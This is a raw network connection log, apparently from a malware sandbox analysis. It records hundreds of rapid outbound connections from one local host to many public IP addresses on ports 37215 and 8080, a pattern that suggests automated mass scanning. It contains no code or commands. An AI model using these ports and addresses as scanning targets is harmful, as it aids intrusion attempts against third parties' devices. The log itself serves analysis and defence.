                                              Nov 23, 2023 05:14:48.596005917 CET5497037215192.168.2.13197.162.137.134
                                              Nov 23, 2023 05:14:48.596007109 CET5497037215192.168.2.13197.84.156.73
                                              Nov 23, 2023 05:14:48.596005917 CET5497037215192.168.2.1341.219.37.65
                                              Nov 23, 2023 05:14:48.596008062 CET5497037215192.168.2.13156.167.182.16
                                              Nov 23, 2023 05:14:48.596014023 CET5497037215192.168.2.1341.247.43.233
                                              Nov 23, 2023 05:14:48.596014023 CET5497037215192.168.2.13197.102.11.207
                                              Nov 23, 2023 05:14:48.596018076 CET5497037215192.168.2.13197.34.239.2
                                              Nov 23, 2023 05:14:48.596018076 CET5497037215192.168.2.1341.117.43.150
                                              Nov 23, 2023 05:14:48.596025944 CET5497037215192.168.2.1341.31.159.254
                                              Nov 23, 2023 05:14:48.596025944 CET5497037215192.168.2.13197.102.63.245
                                              Nov 23, 2023 05:14:48.596035004 CET5497037215192.168.2.13156.170.187.119
                                              Nov 23, 2023 05:14:48.596035004 CET5497037215192.168.2.1341.193.195.219
                                              Nov 23, 2023 05:14:48.596036911 CET5497037215192.168.2.1341.197.119.50
                                              Nov 23, 2023 05:14:48.596051931 CET5497037215192.168.2.13197.177.161.109
                                              Nov 23, 2023 05:14:48.596052885 CET5497037215192.168.2.1341.61.128.162
                                              Nov 23, 2023 05:14:48.596060991 CET5497037215192.168.2.1341.120.44.246
                                              Nov 23, 2023 05:14:48.596066952 CET5497037215192.168.2.13197.59.199.70
                                              Nov 23, 2023 05:14:48.596074104 CET5497037215192.168.2.13197.134.2.29
                                              Nov 23, 2023 05:14:48.596075058 CET5497037215192.168.2.13156.201.140.198
                                              Nov 23, 2023 05:14:48.596081018 CET5497037215192.168.2.13197.111.209.163
                                              Nov 23, 2023 05:14:48.596085072 CET5497037215192.168.2.1341.118.193.219
                                              Nov 23, 2023 05:14:48.596085072 CET5497037215192.168.2.1341.42.96.0
                                              Nov 23, 2023 05:14:48.596096992 CET5497037215192.168.2.13156.151.145.172
                                              Nov 23, 2023 05:14:48.596101999 CET5497037215192.168.2.13156.103.45.191
                                              Nov 23, 2023 05:14:48.596102953 CET5497037215192.168.2.13156.18.68.250
                                              Nov 23, 2023 05:14:48.596110106 CET5497037215192.168.2.13156.20.83.101
                                              Nov 23, 2023 05:14:48.596110106 CET5497037215192.168.2.1341.194.81.187
                                              Nov 23, 2023 05:14:48.596110106 CET5497037215192.168.2.13197.95.242.74
                                              Nov 23, 2023 05:14:48.596112013 CET5497037215192.168.2.13197.154.39.223
                                              Nov 23, 2023 05:14:48.596121073 CET5497037215192.168.2.13197.42.27.145
                                              Nov 23, 2023 05:14:48.596123934 CET5497037215192.168.2.1341.86.123.214
                                              Nov 23, 2023 05:14:48.596126080 CET5497037215192.168.2.1341.197.68.142
                                              Nov 23, 2023 05:14:48.596126080 CET5497037215192.168.2.1341.197.87.26
                                              Nov 23, 2023 05:14:48.596138000 CET5497037215192.168.2.13197.115.212.212
                                              Nov 23, 2023 05:14:48.596148014 CET5497037215192.168.2.13156.193.152.119
                                              Nov 23, 2023 05:14:48.596154928 CET5497037215192.168.2.13197.250.137.10
                                              Nov 23, 2023 05:14:48.596154928 CET5497037215192.168.2.13156.100.63.234
                                              Nov 23, 2023 05:14:48.596155882 CET5497037215192.168.2.13156.144.46.98
                                              Nov 23, 2023 05:14:48.596157074 CET5497037215192.168.2.13156.122.157.194
                                              Nov 23, 2023 05:14:48.596158028 CET5497037215192.168.2.13197.88.6.176
                                              Nov 23, 2023 05:14:48.596168995 CET5497037215192.168.2.1341.100.202.42
                                              Nov 23, 2023 05:14:48.596177101 CET5497037215192.168.2.1341.187.108.21
                                              Nov 23, 2023 05:14:48.596194983 CET5497037215192.168.2.13156.104.189.233
                                              Nov 23, 2023 05:14:48.596194983 CET5497037215192.168.2.13156.164.148.5
                                              Nov 23, 2023 05:14:48.596220970 CET5497037215192.168.2.1341.137.244.55
                                              Nov 23, 2023 05:14:48.596221924 CET5497037215192.168.2.13156.39.184.28
                                              Nov 23, 2023 05:14:48.596221924 CET5497037215192.168.2.1341.4.154.94
                                              Nov 23, 2023 05:14:48.596223116 CET5497037215192.168.2.1341.116.94.109
                                              Nov 23, 2023 05:14:48.596224070 CET5497037215192.168.2.1341.203.104.126
                                              Nov 23, 2023 05:14:48.596224070 CET5497037215192.168.2.1341.82.119.174
                                              Nov 23, 2023 05:14:48.596224070 CET5497037215192.168.2.13197.110.222.118
                                              Nov 23, 2023 05:14:48.596224070 CET5497037215192.168.2.13197.112.14.183
                                              Nov 23, 2023 05:14:48.596229076 CET5497037215192.168.2.1341.97.186.47
                                              Nov 23, 2023 05:14:48.596229076 CET5497037215192.168.2.1341.120.247.108
                                              Nov 23, 2023 05:14:48.596230984 CET5497037215192.168.2.13156.167.34.44
                                              Nov 23, 2023 05:14:48.596240044 CET5497037215192.168.2.13197.217.150.206
                                              Nov 23, 2023 05:14:48.596242905 CET5497037215192.168.2.13156.52.13.109
                                              Nov 23, 2023 05:14:48.596255064 CET5497037215192.168.2.1341.103.247.94
                                              Nov 23, 2023 05:14:48.596256018 CET5497037215192.168.2.13156.93.73.7
                                              Nov 23, 2023 05:14:48.596257925 CET5497037215192.168.2.1341.52.195.232
                                              Nov 23, 2023 05:14:48.596257925 CET5497037215192.168.2.13197.176.4.247
                                              Nov 23, 2023 05:14:48.596271992 CET5497037215192.168.2.13156.220.113.46
                                              Nov 23, 2023 05:14:48.596271992 CET5497037215192.168.2.13197.56.222.230
                                              Nov 23, 2023 05:14:48.596273899 CET5497037215192.168.2.13156.34.224.149
                                              Nov 23, 2023 05:14:48.596282959 CET5497037215192.168.2.1341.233.241.175
                                              Nov 23, 2023 05:14:48.596298933 CET5497037215192.168.2.13156.154.95.72
                                              Nov 23, 2023 05:14:48.596302032 CET5497037215192.168.2.1341.123.187.0
                                              Nov 23, 2023 05:14:48.596302032 CET5497037215192.168.2.1341.234.114.137
                                              Nov 23, 2023 05:14:48.596302032 CET5497037215192.168.2.13197.140.216.129
                                              Nov 23, 2023 05:14:48.596306086 CET5497037215192.168.2.13156.162.85.90
                                              Nov 23, 2023 05:14:48.596323967 CET5497037215192.168.2.1341.28.146.254
                                              Nov 23, 2023 05:14:48.596323967 CET5497037215192.168.2.13197.62.93.237
                                              Nov 23, 2023 05:14:48.596326113 CET5497037215192.168.2.1341.211.138.239
                                              Nov 23, 2023 05:14:48.596328020 CET5497037215192.168.2.13197.66.131.189
                                              Nov 23, 2023 05:14:48.596328020 CET5497037215192.168.2.13197.15.152.228
                                              Nov 23, 2023 05:14:48.596328974 CET5497037215192.168.2.1341.249.178.78
                                              Nov 23, 2023 05:14:48.596354008 CET5497037215192.168.2.13156.65.247.224
                                              Nov 23, 2023 05:14:48.596354008 CET5497037215192.168.2.13197.74.215.255
                                              Nov 23, 2023 05:14:48.596354961 CET5497037215192.168.2.13156.133.253.224
                                              Nov 23, 2023 05:14:48.596355915 CET5497037215192.168.2.13197.154.137.49
                                              Nov 23, 2023 05:14:48.596355915 CET5497037215192.168.2.1341.84.50.20
                                              Nov 23, 2023 05:14:48.596376896 CET5497037215192.168.2.13197.25.254.45
                                              Nov 23, 2023 05:14:48.596376896 CET5497037215192.168.2.13156.232.178.34
                                              Nov 23, 2023 05:14:48.596378088 CET5497037215192.168.2.1341.64.148.81
                                              Nov 23, 2023 05:14:48.596389055 CET5497037215192.168.2.1341.77.146.207
                                              Nov 23, 2023 05:14:48.596404076 CET5497037215192.168.2.13197.69.25.156
                                              Nov 23, 2023 05:14:48.596405983 CET5497037215192.168.2.13156.165.216.221
                                              Nov 23, 2023 05:14:48.596405983 CET5497037215192.168.2.13156.182.138.179
                                              Nov 23, 2023 05:14:48.596406937 CET5497037215192.168.2.13197.137.62.99
                                              Nov 23, 2023 05:14:48.596405983 CET5497037215192.168.2.13156.231.254.160
                                              Nov 23, 2023 05:14:48.596405983 CET5497037215192.168.2.1341.146.38.187
                                              Nov 23, 2023 05:14:48.596415997 CET5497037215192.168.2.1341.151.211.222
                                              Nov 23, 2023 05:14:48.596415997 CET5497037215192.168.2.13156.221.220.104
                                              Nov 23, 2023 05:14:48.596422911 CET5497037215192.168.2.1341.84.151.7
                                              Nov 23, 2023 05:14:48.596425056 CET5497037215192.168.2.13156.126.224.69
                                              Nov 23, 2023 05:14:48.596422911 CET5497037215192.168.2.13156.23.140.173
                                              Nov 23, 2023 05:14:48.596422911 CET5497037215192.168.2.13156.220.215.176
                                              Nov 23, 2023 05:14:48.596426964 CET5497037215192.168.2.1341.199.207.251
                                              Nov 23, 2023 05:14:48.596437931 CET5497037215192.168.2.13197.116.190.141
                                              Nov 23, 2023 05:14:48.596445084 CET5497037215192.168.2.1341.55.179.76
                                              Nov 23, 2023 05:14:48.596445084 CET5497037215192.168.2.13156.182.10.67
                                              Nov 23, 2023 05:14:48.596446991 CET5497037215192.168.2.1341.24.63.105
                                              Nov 23, 2023 05:14:48.596452951 CET5497037215192.168.2.13156.195.68.9
                                              Nov 23, 2023 05:14:48.596452951 CET5497037215192.168.2.1341.137.130.27
                                              Nov 23, 2023 05:14:48.596452951 CET5497037215192.168.2.1341.149.113.137
                                              Nov 23, 2023 05:14:48.596452951 CET5497037215192.168.2.1341.29.77.179
                                              Nov 23, 2023 05:14:48.596471071 CET5497037215192.168.2.13156.42.250.227
                                              Nov 23, 2023 05:14:48.596472979 CET5497037215192.168.2.13197.246.8.235
                                              Nov 23, 2023 05:14:48.596472979 CET5497037215192.168.2.13197.20.112.167
                                              Nov 23, 2023 05:14:48.596474886 CET5497037215192.168.2.1341.251.89.8
                                              Nov 23, 2023 05:14:48.596477032 CET5497037215192.168.2.13197.67.7.153
                                              Nov 23, 2023 05:14:48.596483946 CET5497037215192.168.2.13156.9.112.118
                                              Nov 23, 2023 05:14:48.596484900 CET5497037215192.168.2.13197.107.112.123
                                              Nov 23, 2023 05:14:48.596493959 CET5497037215192.168.2.1341.50.202.244
                                              Nov 23, 2023 05:14:48.596504927 CET5497037215192.168.2.13197.119.245.247
                                              Nov 23, 2023 05:14:48.596510887 CET5497037215192.168.2.1341.223.229.63
                                              Nov 23, 2023 05:14:48.596510887 CET5497037215192.168.2.13156.95.131.151
                                              Nov 23, 2023 05:14:48.596515894 CET5497037215192.168.2.13156.219.78.67
                                              Nov 23, 2023 05:14:48.596519947 CET5497037215192.168.2.13156.126.49.254
                                              Nov 23, 2023 05:14:48.596519947 CET5497037215192.168.2.1341.83.186.179
                                              Nov 23, 2023 05:14:48.596534967 CET5497037215192.168.2.1341.134.112.171
                                              Nov 23, 2023 05:14:48.596540928 CET5497037215192.168.2.13197.41.159.43
                                              Nov 23, 2023 05:14:48.596540928 CET5497037215192.168.2.13197.145.109.192
                                              Nov 23, 2023 05:14:48.596540928 CET5497037215192.168.2.1341.21.182.46
                                              Nov 23, 2023 05:14:48.596540928 CET5497037215192.168.2.13156.170.42.10
                                              Nov 23, 2023 05:14:48.596564054 CET5497037215192.168.2.13156.146.104.245
                                              Nov 23, 2023 05:14:48.596570969 CET5497037215192.168.2.13156.6.109.4
                                              Nov 23, 2023 05:14:48.596570969 CET5497037215192.168.2.13156.64.72.214
                                              Nov 23, 2023 05:14:48.596575975 CET5497037215192.168.2.13197.140.146.230
                                              Nov 23, 2023 05:14:48.596575975 CET5497037215192.168.2.1341.28.91.227
                                              Nov 23, 2023 05:14:48.596576929 CET5497037215192.168.2.1341.252.98.207
                                              Nov 23, 2023 05:14:48.596575975 CET5497037215192.168.2.13156.130.69.167
                                              Nov 23, 2023 05:14:48.596576929 CET5497037215192.168.2.13156.1.243.177
                                              Nov 23, 2023 05:14:48.596582890 CET5497037215192.168.2.13197.140.200.209
                                              Nov 23, 2023 05:14:48.596582890 CET5497037215192.168.2.13197.104.246.254
                                              Nov 23, 2023 05:14:48.596595049 CET5497037215192.168.2.1341.150.98.136
                                              Nov 23, 2023 05:14:48.596600056 CET5497037215192.168.2.13156.74.199.94
                                              Nov 23, 2023 05:14:48.596604109 CET5497037215192.168.2.1341.247.168.229
                                              Nov 23, 2023 05:14:48.596607924 CET5497037215192.168.2.13197.197.81.53
                                              Nov 23, 2023 05:14:48.596615076 CET5497037215192.168.2.13156.166.49.198
                                              Nov 23, 2023 05:14:48.596616030 CET5497037215192.168.2.13156.183.22.4
                                              Nov 23, 2023 05:14:48.596616983 CET5497037215192.168.2.13197.12.158.255
                                              Nov 23, 2023 05:14:48.596628904 CET5497037215192.168.2.13156.214.98.39
                                              Nov 23, 2023 05:14:48.596632957 CET5497037215192.168.2.1341.77.231.92
                                              Nov 23, 2023 05:14:48.596633911 CET5497037215192.168.2.1341.184.33.139
                                              Nov 23, 2023 05:14:48.596637011 CET5497037215192.168.2.1341.131.75.47
                                              Nov 23, 2023 05:14:48.616560936 CET542028080192.168.2.1362.170.190.56
                                              Nov 23, 2023 05:14:48.616573095 CET542028080192.168.2.1331.255.12.189
                                              Nov 23, 2023 05:14:48.616575956 CET542028080192.168.2.1394.48.34.228
                                              Nov 23, 2023 05:14:48.616575956 CET542028080192.168.2.1362.202.73.240
                                              Nov 23, 2023 05:14:48.616576910 CET542028080192.168.2.1385.158.134.214
                                              Nov 23, 2023 05:14:48.616576910 CET542028080192.168.2.1331.150.240.135
                                              Nov 23, 2023 05:14:48.616576910 CET542028080192.168.2.1385.225.41.82
                                              Nov 23, 2023 05:14:48.616576910 CET542028080192.168.2.1395.140.165.3
                                              Nov 23, 2023 05:14:48.616576910 CET542028080192.168.2.1362.141.168.94
                                              Nov 23, 2023 05:14:48.616580009 CET542028080192.168.2.1331.40.117.209
                                              Nov 23, 2023 05:14:48.616580009 CET542028080192.168.2.1395.229.177.50
                                              Nov 23, 2023 05:14:48.616580009 CET542028080192.168.2.1362.76.189.154
                                              Nov 23, 2023 05:14:48.616584063 CET542028080192.168.2.1331.229.36.139
                                              Nov 23, 2023 05:14:48.616584063 CET542028080192.168.2.1394.198.103.103
                                              Nov 23, 2023 05:14:48.616594076 CET542028080192.168.2.1331.52.153.44
                                              Nov 23, 2023 05:14:48.616597891 CET542028080192.168.2.1394.84.139.46
                                              Nov 23, 2023 05:14:48.616600037 CET542028080192.168.2.1394.32.158.114
                                              Nov 23, 2023 05:14:48.616600037 CET542028080192.168.2.1362.81.36.89
                                              Nov 23, 2023 05:14:48.616605997 CET542028080192.168.2.1394.91.182.84
                                              Nov 23, 2023 05:14:48.616609097 CET542028080192.168.2.1362.46.216.188
                                              Nov 23, 2023 05:14:48.616611004 CET542028080192.168.2.1331.240.187.22
                                              Nov 23, 2023 05:14:48.616611004 CET542028080192.168.2.1385.153.18.63
                                              Nov 23, 2023 05:14:48.616614103 CET542028080192.168.2.1362.103.231.178
                                              Nov 23, 2023 05:14:48.616633892 CET542028080192.168.2.1395.78.121.85
                                              Nov 23, 2023 05:14:48.616638899 CET542028080192.168.2.1395.228.241.79
                                              Nov 23, 2023 05:14:48.616650105 CET542028080192.168.2.1331.222.2.59
                                              Nov 23, 2023 05:14:48.616651058 CET542028080192.168.2.1362.213.39.156
                                              Nov 23, 2023 05:14:48.616652966 CET542028080192.168.2.1394.167.14.44
                                              Nov 23, 2023 05:14:48.616652966 CET542028080192.168.2.1385.164.220.253
                                              Nov 23, 2023 05:14:48.616661072 CET542028080192.168.2.1362.47.236.108
                                              Nov 23, 2023 05:14:48.616661072 CET542028080192.168.2.1385.66.36.19
                                              Nov 23, 2023 05:14:48.616661072 CET542028080192.168.2.1394.13.221.166
                                              Nov 23, 2023 05:14:48.616662979 CET542028080192.168.2.1385.30.104.144
                                              Nov 23, 2023 05:14:48.616666079 CET542028080192.168.2.1385.184.202.120
                                              Nov 23, 2023 05:14:48.616667986 CET542028080192.168.2.1331.80.255.169
                                              Nov 23, 2023 05:14:48.616667986 CET542028080192.168.2.1331.190.33.32
                                              Nov 23, 2023 05:14:48.616667986 CET542028080192.168.2.1331.20.238.95
                                              Nov 23, 2023 05:14:48.616668940 CET542028080192.168.2.1395.116.84.209
                                              Nov 23, 2023 05:14:48.616668940 CET542028080192.168.2.1385.149.134.106
                                              Nov 23, 2023 05:14:48.616667986 CET542028080192.168.2.1362.61.87.146
                                              Nov 23, 2023 05:14:48.616667986 CET542028080192.168.2.1385.102.21.89
                                              Nov 23, 2023 05:14:48.616667986 CET542028080192.168.2.1362.70.54.227
                                              Nov 23, 2023 05:14:48.616688967 CET542028080192.168.2.1394.205.42.109
                                              Nov 23, 2023 05:14:48.616688967 CET542028080192.168.2.1362.145.219.95
                                              Nov 23, 2023 05:14:48.616697073 CET542028080192.168.2.1394.75.133.13
                                              Nov 23, 2023 05:14:48.616700888 CET542028080192.168.2.1385.83.87.201
                                              Nov 23, 2023 05:14:48.616704941 CET542028080192.168.2.1385.7.88.221
                                              Nov 23, 2023 05:14:48.616704941 CET542028080192.168.2.1394.82.239.129
                                              Nov 23, 2023 05:14:48.616715908 CET542028080192.168.2.1385.217.143.86
                                              Nov 23, 2023 05:14:48.616715908 CET542028080192.168.2.1385.170.186.71
                                              Nov 23, 2023 05:14:48.616715908 CET542028080192.168.2.1362.136.21.151
                                              Nov 23, 2023 05:14:48.616722107 CET542028080192.168.2.1395.105.48.237
                                              Nov 23, 2023 05:14:48.616724968 CET542028080192.168.2.1362.198.40.38
                                              Nov 23, 2023 05:14:48.616739035 CET542028080192.168.2.1331.89.240.130
                                              Nov 23, 2023 05:14:48.616739035 CET542028080192.168.2.1394.148.123.128
                                              Nov 23, 2023 05:14:48.616741896 CET542028080192.168.2.1385.235.105.166
                                              Nov 23, 2023 05:14:48.616741896 CET542028080192.168.2.1385.71.48.200
                                              Nov 23, 2023 05:14:48.616750002 CET542028080192.168.2.1395.145.52.120
                                              Nov 23, 2023 05:14:48.616750956 CET542028080192.168.2.1362.76.107.39
                                              Nov 23, 2023 05:14:48.616759062 CET542028080192.168.2.1394.236.220.41
                                              Nov 23, 2023 05:14:48.616759062 CET542028080192.168.2.1385.162.138.147
                                              Nov 23, 2023 05:14:48.616766930 CET542028080192.168.2.1362.101.94.64
                                              Nov 23, 2023 05:14:48.616766930 CET542028080192.168.2.1385.58.157.89
                                              Nov 23, 2023 05:14:48.616766930 CET542028080192.168.2.1385.17.97.186
                                              Nov 23, 2023 05:14:48.616766930 CET542028080192.168.2.1395.5.42.4
                                              Nov 23, 2023 05:14:48.616779089 CET542028080192.168.2.1394.8.198.239
                                              Nov 23, 2023 05:14:48.616796017 CET542028080192.168.2.1395.24.112.225
                                              Nov 23, 2023 05:14:48.616796970 CET542028080192.168.2.1394.89.173.180
                                              Nov 23, 2023 05:14:48.616796970 CET542028080192.168.2.1331.34.191.97
                                              Nov 23, 2023 05:14:48.616802931 CET542028080192.168.2.1395.162.239.61
                                              Nov 23, 2023 05:14:48.616802931 CET542028080192.168.2.1395.244.221.152
                                              Nov 23, 2023 05:14:48.616802931 CET542028080192.168.2.1395.65.113.201
                                              Nov 23, 2023 05:14:48.616815090 CET542028080192.168.2.1394.221.46.129
                                              Nov 23, 2023 05:14:48.616817951 CET542028080192.168.2.1395.173.28.231
                                              Nov 23, 2023 05:14:48.616821051 CET542028080192.168.2.1395.3.118.18
                                              Nov 23, 2023 05:14:48.616823912 CET542028080192.168.2.1394.162.186.29
                                              Nov 23, 2023 05:14:48.616826057 CET542028080192.168.2.1362.244.224.198
                                              Nov 23, 2023 05:14:48.616827011 CET542028080192.168.2.1394.232.90.65
                                              Nov 23, 2023 05:14:48.616828918 CET542028080192.168.2.1385.200.229.200
                                              Nov 23, 2023 05:14:48.616843939 CET542028080192.168.2.1362.200.72.5
                                              Nov 23, 2023 05:14:48.616844893 CET542028080192.168.2.1395.111.34.4
                                              Nov 23, 2023 05:14:48.616844893 CET542028080192.168.2.1395.124.197.46
                                              Nov 23, 2023 05:14:48.616844893 CET542028080192.168.2.1331.156.159.251
                                              Nov 23, 2023 05:14:48.616851091 CET542028080192.168.2.1362.141.66.239
                                              Nov 23, 2023 05:14:48.616851091 CET542028080192.168.2.1395.99.89.217
                                              Nov 23, 2023 05:14:48.616852045 CET542028080192.168.2.1394.163.206.158
                                              Nov 23, 2023 05:14:48.616869926 CET542028080192.168.2.1362.88.229.50
                                              Nov 23, 2023 05:14:48.616872072 CET542028080192.168.2.1362.40.152.218
                                              Nov 23, 2023 05:14:48.616878986 CET542028080192.168.2.1394.127.4.157
                                              Nov 23, 2023 05:14:48.616883993 CET542028080192.168.2.1394.169.19.94
                                              Nov 23, 2023 05:14:48.616889000 CET542028080192.168.2.1385.111.141.0
                                              Nov 23, 2023 05:14:48.616893053 CET542028080192.168.2.1395.193.4.119
                                              Nov 23, 2023 05:14:48.616893053 CET542028080192.168.2.1394.182.205.139
                                              Nov 23, 2023 05:14:48.616894007 CET542028080192.168.2.1394.221.21.242
                                              Nov 23, 2023 05:14:48.616895914 CET542028080192.168.2.1394.41.124.225
                                              Nov 23, 2023 05:14:48.616903067 CET542028080192.168.2.1385.58.75.249
                                              Nov 23, 2023 05:14:48.616908073 CET542028080192.168.2.1331.212.61.85
                                              Nov 23, 2023 05:14:48.616919041 CET542028080192.168.2.1385.78.248.135
                                              Nov 23, 2023 05:14:48.616919041 CET542028080192.168.2.1385.45.59.8
                                              Nov 23, 2023 05:14:48.616919994 CET542028080192.168.2.1385.1.253.231
                                              Nov 23, 2023 05:14:48.616919994 CET542028080192.168.2.1385.175.176.217
                                              Nov 23, 2023 05:14:48.616925001 CET542028080192.168.2.1385.53.49.228
                                              Nov 23, 2023 05:14:48.616946936 CET542028080192.168.2.1395.71.70.11
                                              Nov 23, 2023 05:14:48.616952896 CET542028080192.168.2.1385.90.179.49
                                              Nov 23, 2023 05:14:48.616952896 CET542028080192.168.2.1395.102.53.230
                                              Nov 23, 2023 05:14:48.616952896 CET542028080192.168.2.1362.240.151.218
                                              Nov 23, 2023 05:14:48.616952896 CET542028080192.168.2.1362.150.172.33
                                              Nov 23, 2023 05:14:48.616961956 CET542028080192.168.2.1385.51.96.196
                                              Nov 23, 2023 05:14:48.616961956 CET542028080192.168.2.1395.196.28.47
                                              Nov 23, 2023 05:14:48.616961956 CET542028080192.168.2.1385.85.166.136
                                              Nov 23, 2023 05:14:48.616975069 CET542028080192.168.2.1362.142.211.197
                                              Nov 23, 2023 05:14:48.616976976 CET542028080192.168.2.1394.94.185.104
                                              Nov 23, 2023 05:14:48.616976976 CET542028080192.168.2.1362.99.157.97
                                              Nov 23, 2023 05:14:48.616978884 CET542028080192.168.2.1362.92.76.129
                                              Nov 23, 2023 05:14:48.616978884 CET542028080192.168.2.1362.8.43.102
                                              Nov 23, 2023 05:14:48.616992950 CET542028080192.168.2.1331.105.83.220
                                              Nov 23, 2023 05:14:48.616997004 CET542028080192.168.2.1331.144.160.171
                                              Nov 23, 2023 05:14:48.617006063 CET542028080192.168.2.1395.101.217.144
                                              Nov 23, 2023 05:14:48.617006063 CET542028080192.168.2.1331.115.123.47
                                              Nov 23, 2023 05:14:48.617006063 CET542028080192.168.2.1385.35.6.80
                                              Nov 23, 2023 05:14:48.617007971 CET542028080192.168.2.1395.185.180.212
                                              Nov 23, 2023 05:14:48.617008924 CET542028080192.168.2.1331.155.5.188
                                              Nov 23, 2023 05:14:48.617022038 CET542028080192.168.2.1331.111.245.89
                                              Nov 23, 2023 05:14:48.617022038 CET542028080192.168.2.1331.169.230.61
                                              Nov 23, 2023 05:14:48.617024899 CET542028080192.168.2.1385.19.134.139
                                              Nov 23, 2023 05:14:48.617031097 CET542028080192.168.2.1362.139.142.224
                                              Nov 23, 2023 05:14:48.617046118 CET542028080192.168.2.1362.201.186.171
                                              Nov 23, 2023 05:14:48.617047071 CET542028080192.168.2.1395.117.34.25
                                              Nov 23, 2023 05:14:48.617047071 CET542028080192.168.2.1331.6.47.157
                                              Nov 23, 2023 05:14:48.617048025 CET542028080192.168.2.1331.88.22.138
                                              Nov 23, 2023 05:14:48.617048025 CET542028080192.168.2.1331.12.99.184
                                              Nov 23, 2023 05:14:48.617048979 CET542028080192.168.2.1395.85.111.133
                                              Nov 23, 2023 05:14:48.617055893 CET542028080192.168.2.1395.238.71.162
                                              Nov 23, 2023 05:14:48.617077112 CET542028080192.168.2.1331.55.157.137
                                              Nov 23, 2023 05:14:48.617077112 CET542028080192.168.2.1395.31.91.119
                                              Nov 23, 2023 05:14:48.617078066 CET542028080192.168.2.1331.245.215.238
                                              Nov 23, 2023 05:14:48.617078066 CET542028080192.168.2.1395.142.8.229
                                              Nov 23, 2023 05:14:48.617079973 CET542028080192.168.2.1331.212.171.216
                                              Nov 23, 2023 05:14:48.617080927 CET542028080192.168.2.1394.167.192.174
                                              Nov 23, 2023 05:14:48.617080927 CET542028080192.168.2.1362.81.183.82
                                              Nov 23, 2023 05:14:48.617084026 CET542028080192.168.2.1362.78.171.54
                                              Nov 23, 2023 05:14:48.617100000 CET542028080192.168.2.1395.66.193.233
                                              Nov 23, 2023 05:14:48.617100000 CET542028080192.168.2.1385.173.73.77
                                              Nov 23, 2023 05:14:48.617100954 CET542028080192.168.2.1362.178.169.179
                                              Nov 23, 2023 05:14:48.617110968 CET542028080192.168.2.1394.163.91.178
                                              Nov 23, 2023 05:14:48.617117882 CET542028080192.168.2.1395.37.198.49
                                              Nov 23, 2023 05:14:48.617122889 CET542028080192.168.2.1385.187.165.135
                                              Nov 23, 2023 05:14:48.617124081 CET542028080192.168.2.1394.47.62.36
                                              Nov 23, 2023 05:14:48.617124081 CET542028080192.168.2.1394.139.33.208
                                              Nov 23, 2023 05:14:48.617130041 CET542028080192.168.2.1395.112.106.240
                                              Nov 23, 2023 05:14:48.617130041 CET542028080192.168.2.1394.183.115.193
                                              Nov 23, 2023 05:14:48.617130041 CET542028080192.168.2.1395.93.39.143
                                              Nov 23, 2023 05:14:48.617139101 CET542028080192.168.2.1385.11.233.113
                                              Nov 23, 2023 05:14:48.617140055 CET542028080192.168.2.1385.197.67.192
                                              Nov 23, 2023 05:14:48.617141962 CET542028080192.168.2.1331.107.160.140
                                              Nov 23, 2023 05:14:48.617146015 CET542028080192.168.2.1394.116.51.190
                                              Nov 23, 2023 05:14:48.617151022 CET542028080192.168.2.1394.67.201.22
                                              Nov 23, 2023 05:14:48.617161989 CET542028080192.168.2.1385.134.179.139
                                              Nov 23, 2023 05:14:48.617161989 CET542028080192.168.2.1331.9.217.210
                                              Nov 23, 2023 05:14:48.617161989 CET542028080192.168.2.1362.170.82.43
                                              Nov 23, 2023 05:14:48.617176056 CET542028080192.168.2.1394.191.118.187
                                              Nov 23, 2023 05:14:48.617176056 CET542028080192.168.2.1395.104.55.249
                                              Nov 23, 2023 05:14:48.617177963 CET542028080192.168.2.1394.151.120.192
                                              Nov 23, 2023 05:14:48.617186069 CET542028080192.168.2.1385.77.61.254
                                              Nov 23, 2023 05:14:48.617186069 CET542028080192.168.2.1395.47.47.198
                                              Nov 23, 2023 05:14:48.617189884 CET542028080192.168.2.1395.13.193.13
                                              Nov 23, 2023 05:14:48.617193937 CET542028080192.168.2.1362.152.219.144
                                              Nov 23, 2023 05:14:48.617193937 CET542028080192.168.2.1394.207.8.231
                                              Nov 23, 2023 05:14:48.617196083 CET542028080192.168.2.1331.98.138.76
                                              Nov 23, 2023 05:14:48.617198944 CET542028080192.168.2.1395.80.58.50
                                              Nov 23, 2023 05:14:48.617207050 CET542028080192.168.2.1395.160.209.93
                                              Nov 23, 2023 05:14:48.617207050 CET542028080192.168.2.1362.42.55.147
                                              Nov 23, 2023 05:14:48.617218018 CET542028080192.168.2.1394.202.15.168
                                              Nov 23, 2023 05:14:48.617224932 CET542028080192.168.2.1394.90.245.136
                                              Nov 23, 2023 05:14:48.617224932 CET542028080192.168.2.1395.250.124.141
                                              Nov 23, 2023 05:14:48.617228031 CET542028080192.168.2.1362.245.83.139
                                              Nov 23, 2023 05:14:48.617235899 CET542028080192.168.2.1394.99.230.34
                                              Nov 23, 2023 05:14:48.617235899 CET542028080192.168.2.1394.95.79.250
                                              Nov 23, 2023 05:14:48.617238045 CET542028080192.168.2.1394.130.192.122
                                              Nov 23, 2023 05:14:48.617238045 CET542028080192.168.2.1395.178.154.39
                                              Nov 23, 2023 05:14:48.617245913 CET542028080192.168.2.1385.213.181.213
                                              Nov 23, 2023 05:14:48.617245913 CET542028080192.168.2.1331.172.169.231
                                              Nov 23, 2023 05:14:48.617245913 CET542028080192.168.2.1394.14.73.64
                                              Nov 23, 2023 05:14:48.617264032 CET542028080192.168.2.1385.166.231.205
                                              Nov 23, 2023 05:14:48.617264986 CET542028080192.168.2.1394.195.111.144
                                              Nov 23, 2023 05:14:48.617268085 CET542028080192.168.2.1395.112.251.220
                                              Nov 23, 2023 05:14:48.617268085 CET542028080192.168.2.1385.234.153.81
                                              Nov 23, 2023 05:14:48.617269039 CET542028080192.168.2.1362.27.13.75
                                              Nov 23, 2023 05:14:48.617269039 CET542028080192.168.2.1395.209.126.106
                                              Nov 23, 2023 05:14:48.617271900 CET542028080192.168.2.1362.182.250.202
                                              Nov 23, 2023 05:14:48.617271900 CET542028080192.168.2.1385.48.193.126
                                              Nov 23, 2023 05:14:48.617274046 CET542028080192.168.2.1362.201.192.238
                                              Nov 23, 2023 05:14:48.617290974 CET542028080192.168.2.1385.173.148.181
                                              Nov 23, 2023 05:14:48.617290974 CET542028080192.168.2.1395.129.118.211
                                              Nov 23, 2023 05:14:48.617291927 CET542028080192.168.2.1331.49.247.129
                                              Nov 23, 2023 05:14:48.617291927 CET542028080192.168.2.1394.237.189.75
                                              Nov 23, 2023 05:14:48.617295980 CET542028080192.168.2.1385.77.226.90
                                              Nov 23, 2023 05:14:48.617295980 CET542028080192.168.2.1395.202.254.35
                                              Nov 23, 2023 05:14:48.617304087 CET542028080192.168.2.1394.196.223.250
